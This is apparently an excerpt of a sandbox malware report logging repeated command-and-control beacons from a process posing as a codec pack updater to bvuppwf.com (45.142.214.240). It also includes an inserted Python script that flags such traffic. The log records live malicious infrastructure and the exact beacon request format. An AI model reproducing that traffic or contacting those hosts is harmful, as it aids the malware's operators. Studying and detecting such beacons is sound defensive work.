User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:33.160276890 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49784 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:33.499588966 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:33.798856020 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49785 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:34.137988091 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:34.440857887 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49786 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:34.777688980 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:35.075176001 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49787 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:35.421195984 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:35.723900080 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49788 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:36.058656931 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:36.364326000 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49789 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:36.699173927 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:36.995959044 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:37.106190920 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:37.409293890 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49790 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:37.749118090 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:38.048827887 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49791 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:38.599677086 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:38.906938076 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49792 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:39.978368044 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:40.282648087 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49793 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:40.621953011 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:40.917171001 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:41.029453993 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:41.330909014 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49794 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:41.668621063 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:41.965167999 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n
Mar 29, 2024 12:59:42.076478004 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:42.389615059 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n
Mar 29, 2024 12:59:42.497809887 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:42.794445992 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n
Mar 29, 2024 12:59:42.903228998 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:43.203939915 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n
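The sessions above are a textbook C2 beacon: the same GET /search/?q=<hex> to bvuppwf.com roughly every half second, a fixed User-Agent claiming "Windows NT 9.0" (a kernel version no Windows release reports), and a 14-byte chunked body that never changes. The following detector is an added example and not part of the Joe Sandbox report; it parses the report's own flattened row format, decodes the chunked body from the "Data Raw" hex dump, and scores the traffic on those four properties. SAMPLE_LOG is constructed from session 54 and 55 rows with the q= value shortened; the thresholds min_hits and max_cv are assumptions chosen for the example.

```python
"""Beacon detection over a Joe Sandbox HTTP session log (added example, not report output).
Parses rows of the form "<timestamp> CET<bytes><IN|OUT><first line>" plus the header
lines beneath them, decodes chunked bodies, and flags repeated, evenly spaced requests."""
import re
from collections import Counter, defaultdict
from datetime import datetime
from statistics import mean, pstdev

ROW_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+) CET"
                    r"(?P<size>\d+)(?P<dir>IN|OUT)(?P<first>.*)$")
HDR_RE = re.compile(r"^(?P<name>[A-Za-z][A-Za-z -]*): (?P<value>.*)$")
# NT kernel versions that a shipped Windows build can report in a User-Agent string.
KNOWN_NT = {"3.1", "3.5", "3.51", "4.0", "5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}

# Constructed from the report's session 54/55 rows; the q= value is shortened for readability.
SAMPLE_LOG = """\
Mar 29, 2024 12:59:41.668621063 CET326OUTGET /search/?q=67e28dd86d55f128 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:41.965167999 CET220INHTTP/1.1 200 OK
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Mar 29, 2024 12:59:42.076478004 CET326OUTGET /search/?q=67e28dd86d55f128 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:42.389615059 CET220INHTTP/1.1 200 OK
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Mar 29, 2024 12:59:42.497809887 CET326OUTGET /search/?q=67e28dd86d55f128 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:42.794445992 CET220INHTTP/1.1 200 OK
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Mar 29, 2024 12:59:42.903228998 CET326OUTGET /search/?q=67e28dd86d55f128 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:43.203939915 CET220INHTTP/1.1 200 OK
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Mar 29, 2024 12:59:43.547929049 CET326OUTGET /search/?q=67e28dd86d55f128 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:43.846704006 CET220INHTTP/1.1 200 OK
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
"""


def parse_rows(text):
    """Turn the flattened log into one dict per IN/OUT row, with its header lines attached."""
    msgs = []
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        m = ROW_RE.match(line)
        if m:
            head, frac = m["ts"].rsplit(".", 1)  # strptime accepts at most 6 fractional digits
            ts = datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
            msgs.append({"ts": ts, "size": int(m["size"]), "dir": m["dir"],
                         "first": m["first"], "headers": {}})
        elif msgs and (h := HDR_RE.match(line)):
            msgs[-1]["headers"][h["name"]] = h["value"]
    return msgs


def decode_chunked(raw_hex):
    """Decode an HTTP/1.1 chunked body from the report's space-separated hex dump."""
    data = bytes.fromhex(raw_hex.replace(" ", ""))
    out, pos = b"", 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)  # chunk size, ignoring chunk extensions
        if size == 0:
            return out
        out += data[eol + 2:eol + 2 + size]
        pos = eol + 2 + size + 2  # skip the chunk's trailing CRLF


def claims_unreleased_windows(ua):
    """True when the UA names a 'Windows NT x.y' that no Windows release has ever reported."""
    m = re.search(r"Windows NT (\d+\.\d+)", ua or "")
    return bool(m) and m.group(1) not in KNOWN_NT


def score_beacon(msgs, min_hits=4, max_cv=0.5):
    """Score the most-repeated request URI; {} when nothing repeats at least min_hits times."""
    by_uri = defaultdict(list)
    for m in msgs:
        if m["dir"] == "OUT":
            by_uri[m["headers"].get("Host", "") + m["first"].split(" ")[1]].append(m)
    if not by_uri:
        return {}
    uri, hits = max(by_uri.items(), key=lambda kv: len(kv[1]))
    if len(hits) < min_hits:
        return {}
    gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(hits, hits[1:])]
    cv = pstdev(gaps) / mean(gaps)  # low coefficient of variation = timer-driven traffic
    uas = {m["headers"].get("User-Agent", "") for m in hits}
    bodies = Counter(decode_chunked(m["headers"]["Data Raw"])
                     for m in msgs if m["dir"] == "IN" and "Data Raw" in m["headers"])
    f = {"uri": uri, "hits": len(hits), "mean_gap_s": round(mean(gaps), 3), "gap_cv": round(cv, 3),
         "regular_interval": cv <= max_cv, "fixed_ua": len(uas) == 1,
         "unreleased_windows_ua": any(claims_unreleased_windows(ua) for ua in uas),
         "constant_body": len(bodies) == 1, "body": bodies.most_common(1)[0][0] if bodies else b""}
    f["beacon"] = f["regular_interval"] and f["fixed_ua"] and f["constant_body"]
    return f


if __name__ == "__main__":
    for k, v in score_beacon(parse_rows(SAMPLE_LOG)).items():
        print(f"{k:>22}: {v}")
```

The interval test uses the coefficient of variation rather than a fixed period because Socks5Systemz-style clients jitter their sleep; what stays stable is the ratio of spread to mean. On real captures feed the whole session table in, not one session at a time, since the malware opens a fresh source port for almost every request and the pattern only appears across sessions.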


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49795 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:43.547929049 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:43.846704006 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49796 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:44.183959007 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:44.487411022 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49797 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:44.826159954 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:45.124955893 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49798 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:45.464018106 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:45.771872997 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49799 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
